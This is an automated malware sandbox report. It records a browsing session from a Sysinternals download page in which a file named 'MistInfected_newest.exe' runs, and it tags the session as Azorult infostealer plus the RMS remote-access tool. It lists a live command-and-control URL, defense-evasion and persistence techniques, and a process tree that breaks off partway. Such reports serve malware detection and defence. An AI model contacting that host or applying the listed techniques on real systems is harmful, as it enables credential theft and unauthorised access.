Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://learn.micros...

windows10-ltsc_2021-x64

10

Resubmissions

28/03/2025, 07:47

250328-jm2pqsvp15 10

28/03/2025, 07:40

250328-jhpjlstshv 10

28/03/2025, 07:33

250328-jdsqgatscz 10

Analysis

  • max time kernel
    472s
  • max time network
    473s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    28/03/2025, 07:47

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer

Score
10/10
azorultrmsdefense_evasiondiscoveryexecutioninfostealerlateral_movementpersistenceprivilege_escalationrattrojanupx

Malware Config

Extracted

Family

azorult

C2

http://boglogov.site/index.php

Signatures

  • Azorult

    An information stealer that was first discovered in 2016, targeting browsing history and passwords.

    trojaninfostealerazorult
  • Azorult family
    azorult
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 5 IoCs
    defense_evasiontrojan
  • Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs
    defense_evasion
  • RMS

    Remote Manipulator System (RMS) is a remote access tool developed by Russian organization TektonIT.

    trojanratrms
  • Rms family
    rms
  • UAC bypass 3 TTPs 5 IoCs
    defense_evasiontrojan
  • Windows security bypass 2 TTPs 1 IoCs
    defense_evasiontrojan
  • Grants admin privileges 1 TTPs

    Uses net.exe to modify the user's privileges.

  • Remote Service Session Hijacking: RDP Hijacking 1 TTPs 2 IoCs

    Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.

    lateral_movement
  • Blocks application from running via registry modification 13 IoCs

    Adds application to list of disallowed applications.

    defense_evasion
  • Downloads MZ/PE file 2 IoCs
  • Drops file in Drivers directory 5 IoCs
  • Modifies Windows Firewall 2 TTPs 23 IoCs
    defense_evasion
  • Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs
    persistence
  • Sets file to hidden 1 TTPs 3 IoCs

    Modifies file attributes to stop it showing in Explorer etc.

    defense_evasion
  • Sets service image path in registry 2 TTPs 1 IoCs
    persistence
  • Stops running service(s) 4 TTPs
    defense_evasionexecution
  • Checks computer location settings 2 TTPs 11 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Loads dropped DLL 2 IoCs
  • Modifies file permissions 1 TTPs 62 IoCs
    discovery
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Checks whether UAC is enabled 1 TTPs 1 IoCs
    defense_evasiontrojan
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Enumerates connected drives 3 TTPs 23 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 12 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Modifies WinLogon 2 TTPs 7 IoCs
    persistence
  • Password Policy Discovery 1 TTPs

    Attempt to access detailed information about the password policy used within an enterprise network.

    discovery
  • AutoIT Executable 5 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in System32 directory 9 IoCs
  • Hide Artifacts: Hidden Users 1 TTPs 4 IoCs
    defense_evasion
  • UPX packed file 6 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

    upx
  • Drops file in Program Files directory 27 IoCs
  • Drops file in Windows directory 64 IoCs
  • Launches sc.exe 24 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 64 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

    persistenceprivilege_escalation
  • Permission Groups Discovery: Local Groups 1 TTPs

    Attempt to find local system groups and permission settings.

    discovery
  • System Location Discovery: System Language Discovery 1 TTPs 64 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 7 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Gathers network information 2 TTPs 1 IoCs

    Uses commandline utility to view network configuration.

  • Kills process with taskkill 5 IoCs
    defense_evasion
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 2 IoCs
  • Modifies registry class 48 IoCs
  • NTFS ADS 1 IoCs
  • Runs .reg file with regedit 2 IoCs
  • Runs net.exe
  • Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 5 IoCs
  • Suspicious behavior: LoadsDriver 6 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 26 IoCs
  • Suspicious behavior: SetClipboardViewer 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 38 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 24 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • System policy modification 1 TTPs 3 IoCs
    defense_evasion
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence
  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

    ransomware
  • Views/modifies file attributes 1 TTPs 6 IoCs
    defense_evasion

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://learn.microsoft.com/en-us/sysinternals/downloads/process-explorer
    1⤵
    • Loads dropped DLL
    • Drops file in Windows directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4408
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x304,0x7ff88615f208,0x7ff88615f214,0x7ff88615f220
      2⤵
        PID:4284
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1908,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=2288 /prefetch:3
        2⤵
        • Downloads MZ/PE file
        PID:1956
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2252,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=2248 /prefetch:2
        2⤵
          PID:3928
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2612,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=2748 /prefetch:8
          2⤵
            PID:4296
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3564,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3612 /prefetch:1
            2⤵
              PID:1244
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3584,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3616 /prefetch:1
              2⤵
                PID:3812
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5064,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5080 /prefetch:1
                2⤵
                  PID:2528
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4944,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3636 /prefetch:1
                  2⤵
                    PID:5324
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=5208,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5380 /prefetch:1
                    2⤵
                      PID:5996
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=3852,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=4872 /prefetch:8
                      2⤵
                        PID:4320
                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5252,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5452 /prefetch:8
                        2⤵
                          PID:1864
                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5704,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5244 /prefetch:8
                          2⤵
                            PID:5748
                          • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5896,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:8
                            2⤵
                              PID:3680
                            • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5896,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5104 /prefetch:8
                              2⤵
                                PID:4024
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6168,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6172 /prefetch:8
                                2⤵
                                  PID:4032
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5552,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6352 /prefetch:8
                                  2⤵
                                    PID:3120
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=6068,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=4400 /prefetch:1
                                    2⤵
                                      PID:1896
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6348,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5404 /prefetch:8
                                      2⤵
                                        PID:5752
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --always-read-main-dll --field-trial-handle=6312,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3692 /prefetch:1
                                        2⤵
                                          PID:2956
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6204,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=4376 /prefetch:8
                                          2⤵
                                            PID:1628
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6320,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:8
                                            2⤵
                                              PID:5888
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6060,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6364 /prefetch:8
                                              2⤵
                                                PID:5304
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6780,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6108 /prefetch:8
                                                2⤵
                                                  PID:2160
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --always-read-main-dll --field-trial-handle=2100,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6720 /prefetch:1
                                                  2⤵
                                                    PID:2144
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6392,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5644 /prefetch:8
                                                    2⤵
                                                      PID:1208
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --always-read-main-dll --field-trial-handle=6900,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6592 /prefetch:1
                                                      2⤵
                                                        PID:1004
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --always-read-main-dll --field-trial-handle=6432,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5096 /prefetch:1
                                                        2⤵
                                                          PID:4932
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6108,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6956 /prefetch:8
                                                          2⤵
                                                            PID:3288
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --always-read-main-dll --field-trial-handle=7540,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5340 /prefetch:1
                                                            2⤵
                                                              PID:1148
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7572,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7352 /prefetch:8
                                                              2⤵
                                                                PID:5672
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --always-read-main-dll --field-trial-handle=7396,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6568 /prefetch:1
                                                                2⤵
                                                                  PID:4688
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --always-read-main-dll --field-trial-handle=7600,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=5116 /prefetch:1
                                                                  2⤵
                                                                    PID:2728
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6388,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7152 /prefetch:8
                                                                    2⤵
                                                                      PID:3780
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --always-read-main-dll --field-trial-handle=3636,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6676 /prefetch:1
                                                                      2⤵
                                                                        PID:5848
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --always-read-main-dll --field-trial-handle=7592,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=6892 /prefetch:1
                                                                        2⤵
                                                                          PID:2484
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --always-read-main-dll --field-trial-handle=3912,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:1
                                                                          2⤵
                                                                            PID:5432
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --always-read-main-dll --field-trial-handle=7692,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7632 /prefetch:1
                                                                            2⤵
                                                                              PID:2124
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.4355 --string-annotations --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=8020,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8016 /prefetch:8
                                                                              2⤵
                                                                                PID:3760
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7520,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7056 /prefetch:8
                                                                                2⤵
                                                                                  PID:5956
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --always-read-main-dll --field-trial-handle=8080,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=3312 /prefetch:1
                                                                                  2⤵
                                                                                    PID:5100
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6220,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=8088 /prefetch:8
                                                                                    2⤵
                                                                                      PID:4228
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=8116,i,6469238534999871217,10177555890761274800,262144 --variations-seed-version --mojo-platform-channel-handle=7348 /prefetch:8
                                                                                      2⤵
                                                                                        PID:4840
                                                                                      • C:\Users\Admin\Downloads\MistInfected_newest.exe
                                                                                        "C:\Users\Admin\Downloads\MistInfected_newest.exe"
                                                                                        2⤵
                                                                                        • Drops file in Drivers directory
                                                                                        • Executes dropped EXE
                                                                                        PID:2348
                                                                                        • C:\Users\Admin\AppData\Local\Temp\MistInfected_newest.exe
                                                                                          "C:\Users\Admin\AppData\Local\Temp\MistInfected_newest.exe"
                                                                                          3⤵
                                                                                          • Executes dropped EXE
                                                                                          • System Location Discovery: System Language Discovery
                                                                                          PID:964
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
